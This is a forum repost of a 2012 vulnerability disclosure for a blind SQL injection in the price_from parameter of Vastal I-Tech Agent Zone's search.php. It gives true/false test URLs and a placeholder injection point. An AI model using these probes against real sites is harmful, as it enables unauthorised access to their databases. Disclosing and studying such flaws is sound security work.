Jump to content
The_Arhitect

Vastal I-Tech Agent Zone (search.php) Blind SQL Injection Vulnerability

Recommended Posts

Posted

Vastal I-Tech Agent Zone (search.php) Blind SQL Injection Vulnerability

Agent Zone Vastal I-Tech Blind SQL Injection Vulnerability
# Date: 31.01.2012
# Author: Cagri Tepebasili
# Software : http://www.vastal.com/agent-zone-real-estate-script.html
# Tested on: Linux Mint 12
#####################################################################################################################
The First Step >>>
http://server/real/search.php?price_from=1000000.00+and+1=1&price_to=10000000.00
The Second Step >>>
http://server/real/search.php?price_from=1000000.00+and+1=0&price_to=10000000.00
Injection >>>
http://server/real/search.php?price_from=1000000.00[BlindSQLI]&price_to=10000000.00
Greetz : MythSEC <<<

Sursa: Vastal I-Tech Agent Zone (search.php) Blind SQL Injection Vulnerability

  • Downvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...